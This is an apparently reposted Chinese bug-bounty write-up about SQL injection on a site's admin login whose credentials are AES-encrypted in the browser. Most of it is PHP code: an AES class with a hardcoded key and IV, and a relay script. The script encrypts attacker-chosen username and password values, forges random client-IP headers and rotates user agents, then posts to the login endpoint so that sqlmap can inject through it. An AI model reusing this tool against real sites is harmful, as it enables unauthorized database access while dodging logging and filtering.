文章来源:转载来源语雀文档,非P喵呜作者本人投稿
如有侵权,请联系删除
0x01 概要
站点:http://aa.test.com/Admin/Login
这样看起来是一个挺正常的界面,测试一下发现存在注入
很清楚的可以看到两张图片是有明显的区别的,说明有注入
抓包时发现!!!!
0x02 查看前端加密方式
前端加密的话,那就只需要找到对应前端加密脚本即可
0x03 编码对应解密脚本
# AES 加解密脚本
<?php
/**
* AES/CBC/PKCS5Padding 模式 加密解密
*/
class Crypt {
/**
* [$cipher 加密模式]
* @var [type]
*/
private $cipher = MCRYPT_RIJNDAEL_128;
private $mode = MCRYPT_MODE_CBC;
/**
* [$key 密匙]
* @var string
*/
private $secret_key = '123456789ABCDEFG123456789ABCDEFG';
/**
* [$iv 偏移量]
* @var string
*/
private $iv = '123456789ABCDEFG';
function setCipher($cipher=''){
$cipher && $this->cipher = $cipher;
}
function setMode($mode=''){
$mode && $this->mode = $mode;
}
function setSecretKey($secret_key=''){
$secret_key && $this->secret_key = $secret_key;
}
function setIv($iv=''){
$iv && $this->iv = $iv;
}
//加密
function encrypt($str)
{
$size = mcrypt_get_block_size ( MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC );
$str = $this->pkcs5Pad ( $str, $size );
$data=@mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_ENCRYPT, $this->iv);
//bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值
$data=strtolower(bin2hex($data));
return $data;
}
//解密
function decrypt($str)
{
$str = $this->hex2bin( strtolower($str));
$str = mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_DECRYPT, $this->iv );
$str = $this->pkcs5Unpad( $str );
return $str;
}
//bin2hex 还原
private function hex2bin($hexData)
{
$binData = "";
for($i = 0; $i < strlen ( $hexData ); $i += 2)
{
$binData .= chr(hexdec(substr($hexData, $i, 2)));
}
return $binData;
}
//PKCS5Padding
private function pkcs5Pad($text, $blocksize)
{
$pad = $blocksize - (strlen ( $text ) % $blocksize);
return $text . str_repeat ( chr ( $pad ), $pad );
}
private function pkcs5Unpad($text)
{
$pad = ord ( $text {strlen ( $text ) - 1} );
if ($pad > strlen ( $text ))
return false;
if (strspn ( $text, chr ( $pad ), strlen ( $text ) - $pad ) != $pad)
return false;
return substr ( $text, 0, - 1 * $pad );
}
}
echo (new Crypt())->encrypt('111');
可以看得到一致的,那就可以正常注入了
# 注入脚本
<?php
/**
* AES/CBC/PKCS5Padding 模式 加密解密
*/
class Crypt {
/**
* [$cipher 加密模式]
* @var [type]
*/
private $cipher = MCRYPT_RIJNDAEL_128;
private $mode = MCRYPT_MODE_CBC;
/**
* [$key 密匙]
* @var string
*/
private $secret_key = '123456789ABCDEFG123456789ABCDEFG';
/**
* [$iv 偏移量]
* @var string
*/
private $iv = '123456789ABCDEFG';
function setCipher($cipher=''){
$cipher && $this->cipher = $cipher;
}
function setMode($mode=''){
$mode && $this->mode = $mode;
}
function setSecretKey($secret_key=''){
$secret_key && $this->secret_key = $secret_key;
}
function setIv($iv=''){
$iv && $this->iv = $iv;
}
//加密
function encrypt($str)
{
$size = mcrypt_get_block_size ( MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC );
$str = $this->pkcs5Pad ( $str, $size );
$data=@mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_ENCRYPT, $this->iv);
//bin2hex() 函数把 ASCII 字符的字符串转换为十六进制值
$data=strtolower(bin2hex($data));
return $data;
}
//解密
function decrypt($str)
{
$str = $this->hex2bin( strtolower($str));
$str = mcrypt_cbc(MCRYPT_RIJNDAEL_128, $this->secret_key, $str, MCRYPT_DECRYPT, $this->iv );
$str = $this->pkcs5Unpad( $str );
return $str;
}
//bin2hex 还原
private function hex2bin($hexData)
{
$binData = "";
for($i = 0; $i < strlen ( $hexData ); $i += 2)
{
$binData .= chr(hexdec(substr($hexData, $i, 2)));
}
return $binData;
}
//PKCS5Padding
private function pkcs5Pad($text, $blocksize)
{
$pad = $blocksize - (strlen ( $text ) % $blocksize);
return $text . str_repeat ( chr ( $pad ), $pad );
}
private function pkcs5Unpad($text)
{
$pad = ord ( $text {strlen ( $text ) - 1} );
if ($pad > strlen ( $text ))
return false;
if (strspn ( $text, chr ( $pad ), strlen ( $text ) - $pad ) != $pad)
return false;
return substr ( $text, 0, - 1 * $pad );
}
}
class SqlCurl
{
public function curlRequest($url, $post = [], $cookie = '', $referurl = '')
{
if (!$referurl) {
$referurl = 'https://www.baidu.com';
}
$header = array(
'CLIENT-IP:' . $this->getIp(),
'X-FORWARDED-FOR:' . $this->getIp(),
'HTTP_CLIENT_IP:' .$this->getIp(),
'HTTP_X_FORWARDED_FOR' . $this->getIp(),
'REMOTE_ADDR:' . $this->getIp(),
'Content-Type:application/x-www-form-urlencoded',
'X-Requested-With:XMLHttpRequest',
);
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
//随机浏览器 useragent
curl_setopt($curl, CURLOPT_USERAGENT, $this->agentArry());
curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
curl_setopt($curl, CURLOPT_REFERER, $referurl);
curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
if ($post) {
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
}
if ($cookie) {
curl_setopt($curl, CURLOPT_COOKIE, $cookie);
}
curl_setopt($curl, CURLOPT_TIMEOUT, 10);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
$data = curl_exec($curl);
if (curl_errno($curl)) {
return curl_error($curl);
}
curl_close($curl);
return $data;
}
private function getIp()
{
return mt_rand(11, 191) . "." . mt_rand(0, 240) . "." . mt_rand(1, 240) . "." . mt_rand(1, 240);
}
private function agentArry()
{
$agentarry = [
//PC 端的 UserAgent
"safari 5.1 – MAC" => "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
"safari 5.1 – Windows" => "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50",
"Firefox 38esr" => "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0",
"IE 11" => "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; rv:11.0) like Gecko",
"IE 9.0" => "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0",
"IE 8.0" => "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)",
"IE 7.0" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
"IE 6.0" => "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Firefox 4.0.1 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Firefox 4.0.1 – Windows" => "Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1",
"Opera 11.11 – MAC" => "Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11",
"Opera 11.11 – Windows" => "Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11",
"Chrome 17.0 – MAC" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"傲游(Maxthon)" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)",
"腾讯 TT" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)",
"世界之窗(The World) 2.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
"世界之窗(The World) 3.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)",
"360 浏览器" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)",
"搜狗浏览器 1.x" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)",
"Avant" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)",
"Green Browser" => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)",
//移动端口
"safari iOS 4.33 – iPhone" => "Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
"safari iOS 4.33 – iPod Touch" => "Mozilla/5.0 (iPod; U; CPU iPhone OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
"safari iOS 4.33 – iPad" => "Mozilla/5.0 (iPad; U; CPU OS 4_3_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8J2 Safari/6533.18.5",
"Android N1" => "Mozilla/5.0 (Linux; U; Android 2.3.7; en-us; Nexus One Build/FRF91) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Android QQ 浏览器 For android" => "MQQBrowser/26 Mozilla/5.0 (Linux; U; Android 2.3.7; zh-cn; MB200 Build/GRJ22; CyanogenMod-7) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Android Opera Mobile" => "Opera/9.80 (Android 2.3.4; Linux; Opera Mobi/build-1107180945; U; en-GB) Presto/2.8.149 Version/11.10",
"Android Pad Moto Xoom" => "Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13",
"BlackBerry" => "Mozilla/5.0 (BlackBerry; U; BlackBerry 9800; en) AppleWebKit/534.1+ (KHTML, like Gecko) Version/6.0.0.337 Mobile Safari/534.1+",
"WebOS HP Touchpad" => "Mozilla/5.0 (hp-tablet; Linux; hpwOS/3.0.0; U; en-US) AppleWebKit/534.6 (KHTML, like Gecko) wOSBrowser/233.70 Safari/534.6 TouchPad/1.0",
"UC 标准" => "NOKIA5700/ UCWEB7.0.2.37/28/999",
"UCOpenwave" => "Openwave/ UCWEB7.0.2.37/28/999",
"UC Opera" => "Mozilla/4.0 (compatible; MSIE 6.0; ) Opera/UCWEB7.0.2.37/28/999",
"微信内置浏览器" => "Mozilla/5.0 (Linux; Android 6.0; 1503-M02 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile MQQBrowser/6.2 TBS/036558 Safari/537.36 MicroMessenger/6.3.25.861 NetType/WIFI Language/zh_CN",
];
return $agentarry[array_rand($agentarry, 1)];
}
}
// http://aa.test.com:8088/Admin/Login?tdsourcetag=s_pctim_aiomsg#
$data['UserName'] = (new Crypt())->encrypt($_GET['UserName']);
$data['Password'] = (new Crypt())->encrypt($_GET['Password']);
echo (new SqlCurl())->curlRequest('http://aa.test.com:8088/Admin/Login_Submit', $data);
0x04 Sqlmap 正常注入
推荐阅读
星球部分精华内容推荐
其他更多精彩内容,欢迎加入我们的星球
原文始发于微信公众号(HACK学习君):实战 | 漏洞挖掘之众测厂商某站点绕过前端加密进行注入
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论